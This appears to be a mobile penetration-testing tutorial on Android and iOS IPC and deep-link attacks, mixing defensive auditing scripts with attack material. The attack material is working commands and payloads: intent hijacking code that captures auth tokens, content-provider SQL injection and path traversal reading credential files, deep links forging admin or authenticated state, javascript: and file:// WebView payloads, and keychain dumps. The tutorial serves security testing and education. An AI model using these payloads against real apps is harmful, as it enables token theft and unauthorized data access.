
IPC & Deep Link Attacks

Inter-Process Communication (IPC) mechanisms allow apps to share data and functionality. When improperly secured, they can be exploited to steal data, bypass authentication, or execute unauthorized actions.

Android IPC Mechanisms

Intents

Messaging objects used to request an action from another component. Explicit intents name the target component; implicit intents declare only an action (plus optional data and category), and the system resolves them against the intent filters of every installed app, so any matching app may receive them.

Content Providers

Structured data sharing mechanism. Can expose databases to other applications if exported.

Broadcast Receivers

Components that respond to system-wide broadcast messages. Can leak data if exported.

Services

Background components that can be bound to by other apps if exported without proper permissions.

Finding Exported Components

Manifest Analysis

bash
# Decompile and check AndroidManifest.xml
apktool d target.apk -o decompiled

# Look for exported components
grep -E 'exported="true"' decompiled/AndroidManifest.xml

# Check for intent filters (a component with an <intent-filter> and no android:exported
# attribute is exported by default when targetSdkVersion < 31)
grep -B5 -A5 "<intent-filter" decompiled/AndroidManifest.xml

# Vulnerable patterns:
# android:exported="true"
# <intent-filter> (without exported="false")
# android:permission="" (empty permission)
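
The same three patterns can be checked mechanically. The script below is an added example (not part of the original page or any tool named on it) that parses a decompiled manifest and applies Android's export defaults; the manifest it runs against is a constructed sample.

```python
# Added example: audit AndroidManifest.xml for components reachable by other apps.
# android:exported wins when present; otherwise a component with an <intent-filter> is
# exported by default on targetSdk < 31 (providers: exported by default on targetSdk < 17).
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

def _attr(elem, name):
    return elem.get("{%s}%s" % (ANDROID_NS, name))

def audit_manifest(manifest_xml):
    """Return a list of (tag, name, reason, permission) for every exported component."""
    root = ET.fromstring(manifest_xml)
    uses_sdk = root.find("uses-sdk")
    target_sdk = int(_attr(uses_sdk, "targetSdkVersion") or 1) if uses_sdk is not None else 1
    findings = []
    for comp in root.iter():
        if comp.tag not in COMPONENT_TAGS:
            continue
        exported = _attr(comp, "exported")
        has_filter = comp.find("intent-filter") is not None
        if exported == "true":
            reason = 'android:exported="true"'
        elif exported is None and has_filter and target_sdk < 31:
            reason = "intent-filter without android:exported (implicit export)"
        elif exported is None and comp.tag == "provider" and target_sdk < 17:
            reason = "provider with no android:exported on targetSdk < 17"
        else:
            continue
        perm = _attr(comp, "permission") or ""   # "" covers both absent and empty permission
        findings.append((comp.tag, _attr(comp, "name"), reason, perm))
    return findings

# Constructed sample manifest (not taken from any real app)
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.demo">
  <uses-sdk android:targetSdkVersion="30"/>
  <application>
    <activity android:name=".MainActivity"><intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter></activity>
    <activity android:name=".AdminActivity" android:exported="true" android:permission=""/>
    <activity android:name=".InternalActivity" android:exported="false"><intent-filter><action android:name="x"/></intent-filter></activity>
    <provider android:name=".UserProvider" android:authorities="com.example.demo.provider"/>
    <service android:name=".SyncService" android:exported="true" android:permission="com.example.demo.SYNC"/>
  </application>
</manifest>"""

if __name__ == "__main__":
    for tag, name, reason, perm in audit_manifest(SAMPLE_MANIFEST):
        print("%-8s %-20s %s [%s]" % (tag, name, reason, perm or "NO PERMISSION"))
```

Components listed with NO PERMISSION are the ones any app on the device can reach; raising targetSdkVersion to 31 in the sample removes the implicitly exported MainActivity from the report.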

Drozer Analysis

Use Drozer for comprehensive IPC analysis:

bash
# Start Drozer
adb forward tcp:31415 tcp:31415
drozer console connect

# List exported activities
run app.activity.info -a com.target.app

# List exported services
run app.service.info -a com.target.app

# List exported broadcast receivers
run app.broadcast.info -a com.target.app

# List exported content providers
run app.provider.info -a com.target.app

# Find attack surface
run app.package.attacksurface com.target.app

Intent Attacks

Starting Exported Activities

bash
# Using ADB to start activity
adb shell am start -n com.target.app/.AdminActivity

# With extra data
adb shell am start -n com.target.app/.DeepLinkActivity \
    --es "url" "https://evil.com" \
    --ei "user_id" 1337

# Using Drozer
run app.activity.start --component com.target.app com.target.app.AdminActivity
run app.activity.start --component com.target.app com.target.app.DeepLinkActivity \
    --extra string url https://evil.com

Intercepting Implicit Intents

xml
<!-- Malicious app registering for the target's implicit intent action -->
<activity android:name=".MaliciousActivity">
    <intent-filter>
        <action android:name="com.target.app.SHARE_DATA" />
        <category android:name="android.intent.category.DEFAULT" />
    </intent-filter>
</activity>

java
// Intercept and log data carried by the implicit intent
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;

public class MaliciousActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent intent = getIntent();
        String sensitiveData = intent.getStringExtra("auth_token");
        Log.d("STOLEN", "Token: " + sensitiveData);
    }
}

Content Provider Attacks

SQL Injection

bash
# Find content URIs
run scanner.provider.finduris -a com.target.app

# Test for SQL injection
run app.provider.query content://com.target.app.provider/users --projection "* FROM users--"

# Extract all data
run app.provider.query content://com.target.app.provider/users

# Test injection with Drozer
run scanner.provider.injection -a com.target.app

# Path traversal
run app.provider.read content://com.target.app.provider/../../../etc/passwd

Path Traversal

bash
# Test for path traversal
run scanner.provider.traversal -a com.target.app

# Read arbitrary files
run app.provider.read content://com.target.app.fileprovider/../../../../data/data/com.target.app/shared_prefs/auth.xml

# Using ADB
adb shell content read --uri content://com.target.app.provider/../../../data/data/com.target.app/databases/app.db

Deep Link Exploitation

What are Deep Links?

Deep links allow external URLs to open specific screens within an app. Improper validation can lead to sensitive data exposure, authentication bypass, or cross-site scripting.

Finding Deep Link Schemes

bash
# Check AndroidManifest.xml for schemes
grep -E "android:scheme|android:host|android:pathPrefix" AndroidManifest.xml

# Example patterns:
# <data android:scheme="myapp" />
# <data android:scheme="https" android:host="app.target.com" />

# Test deep link
adb shell am start -a android.intent.action.VIEW \
    -d "myapp://settings/admin" com.target.app

# Test App Links (Android)
adb shell am start -a android.intent.action.VIEW \
    -d "https://app.target.com/oauth/callback?token=stolen"

Common Deep Link Vulnerabilities

OAuth Token Theft

bash
# Trigger the OAuth callback deep link
adb shell am start -a android.intent.action.VIEW \
    -d "myapp://oauth/callback?code=AUTH_CODE"

xml
<!-- Register malicious app to intercept (custom schemes have no owner, so any app may claim one) -->
<intent-filter>
    <action android:name="android.intent.action.VIEW" />
    <category android:name="android.intent.category.DEFAULT" />
    <data android:scheme="myapp" android:host="oauth" />
</intent-filter>

Authentication Bypass

bash
# Skip login via deep link
adb shell am start -d "myapp://home?authenticated=true"
adb shell am start -d "myapp://admin?role=admin"
adb shell am start -d "myapp://reset-password?user_id=victim"

JavaScript Injection (WebView)

bash
# If deep link loads in WebView with JS enabled
adb shell am start -d "myapp://webview?url=javascript:alert(document.cookie)"
adb shell am start -d "myapp://browser?url=file:///data/data/com.target.app/shared_prefs/auth.xml"
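
The handler-side fix for the authentication-bypass and WebView cases above is a strict allowlist applied before the link is acted on. The function below is an added example (not code from the original page or from any real app); its scheme, host list and WebView origin are hypothetical values modelled on the patterns shown above.

```python
# Added example: allowlist checks a deep-link handler should apply before acting on a URL.
# Scheme, hosts and the WebView origin are hypothetical values modelled on the patterns above.
from urllib.parse import urlsplit, parse_qs

APP_SCHEME = "myapp"
ALLOWED_HOSTS = {"settings", "home", "webview", "oauth"}
# Auth state and identity must come from the session, never from link parameters
FORBIDDEN_PARAMS = {"authenticated", "role", "user_id"}
# Only https pages on our own origin may be loaded into the WebView (hypothetical host)
WEBVIEW_ALLOWED_HOSTS = {"app.target.com"}

def validate_deep_link(url):
    """Return (ok, detail); on ok=False the link is dropped, never partially handled."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if parts.scheme != APP_SCHEME:
        return False, "unexpected scheme %r" % parts.scheme
    if host not in ALLOWED_HOSTS:
        return False, "host %r not in allowlist" % host
    params = parse_qs(parts.query, keep_blank_values=True)
    tainted = FORBIDDEN_PARAMS & set(params)
    if tainted:
        return False, "auth-state parameter(s) supplied by link: %s" % sorted(tainted)
    if host == "webview":
        target = params.get("url", [""])[0]
        t = urlsplit(target)
        # Rejects javascript:, file:, content:, intent: and any foreign https origin
        if t.scheme != "https" or (t.hostname or "") not in WEBVIEW_ALLOWED_HOSTS:
            return False, "webview target %r rejected" % target
    # The destination screen still enforces its own authorization against the session.
    return True, "ok"

if __name__ == "__main__":
    # Constructed sample links mirroring the cases discussed above
    for link in ("myapp://settings/admin",
                 "myapp://home?authenticated=true",
                 "myapp://webview?url=javascript:alert(document.cookie)",
                 "myapp://webview?url=https://app.target.com/help"):
        print(link, "->", validate_deep_link(link))
```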

iOS IPC Mechanisms

URL Schemes

bash
# Find URL schemes in Info.plist
plutil -p Info.plist | grep -A10 CFBundleURLTypes

# Or unzip the IPA and read the plist from the app bundle
unzip app.ipa -d extracted
plutil -p extracted/Payload/App.app/Info.plist

# Test URL scheme
# On device: Safari > myapp://admin
# Via Terminal:
xcrun simctl openurl booted "myapp://settings/admin"

Universal Links

bash
# Check for associated domains in entitlements
codesign -d --entitlements :- App.app | grep associated-domains

# Fetch apple-app-site-association
curl https://target.com/.well-known/apple-app-site-association
curl https://target.com/apple-app-site-association

# Test Universal Links
# Send link via iMessage/Notes and tap it

App Extensions & Groups

bash
# Check for shared app groups
codesign -d --entitlements :- App.app | grep group

# Shared container location
# /var/mobile/Containers/Shared/AppGroup/<group-id>/

# Using Objection
ios nsurlcredentialstorage dump
ios keychain dump --json

Dynamic Analysis with Frida

Android Intent Monitoring

intent_monitor.js
javascript
Java.perform(function() {
    var Intent = Java.use('android.content.Intent');
    
    Intent.getStringExtra.implementation = function(name) {
        var value = this.getStringExtra(name);
        console.log('[Intent] getStringExtra(' + name + ') = ' + value);
        return value;
    };
    
    Intent.getData.implementation = function() {
        var uri = this.getData();
        if (uri != null) {
            console.log('[Intent] getData() = ' + uri.toString());
        }
        return uri;
    };
    
    // Monitor startActivity
    var Activity = Java.use('android.app.Activity');
    Activity.startActivity.overload('android.content.Intent').implementation = function(intent) {
        console.log('[Activity] startActivity: ' + intent.toString());
        console.log('  Action: ' + intent.getAction());
        console.log('  Data: ' + intent.getData());
        this.startActivity(intent);
    };
});

iOS URL Handling Monitor

ios_url_monitor.js
javascript
if (ObjC.available) {
    var UIApplication = ObjC.classes.UIApplication;

    // Hook openURL: (deprecated, but still called by many apps)
    Interceptor.attach(UIApplication['- openURL:'].implementation, {
        onEnter: function(args) {
            var url = new ObjC.Object(args[2]);
            console.log('[openURL] ' + url.toString());
        }
    });

    // Hook application:openURL:options: on the concrete delegate class.
    // A protocol cannot be hooked directly, so resolve the delegate at runtime.
    var delegate = UIApplication.sharedApplication().delegate();
    if (!delegate.isNull()) {
        var AppDelegate = ObjC.classes[delegate.$className];
        var handler = AppDelegate['- application:openURL:options:'];
        if (handler) {
            Interceptor.attach(handler.implementation, {
                onEnter: function(args) {
                    // args[0] = self, args[1] = selector, args[2] = application, args[3] = url
                    var url = new ObjC.Object(args[3]);
                    console.log('[application:openURL] ' + url.toString());
                }
            });
        } else {
            console.log('[!] ' + delegate.$className + ' does not implement application:openURL:options:');
        }
    }
}

IPC Testing Checklist

  • Identify all exported components
  • Test content providers for SQL injection
  • Test content providers for path traversal
  • Enumerate and test all deep link schemes
  • Test for intent hijacking vulnerabilities
  • Check broadcast receivers for data leakage
  • Verify proper permission checks on services
  • Test WebView URL loading via deep links
  • Check OAuth callback interception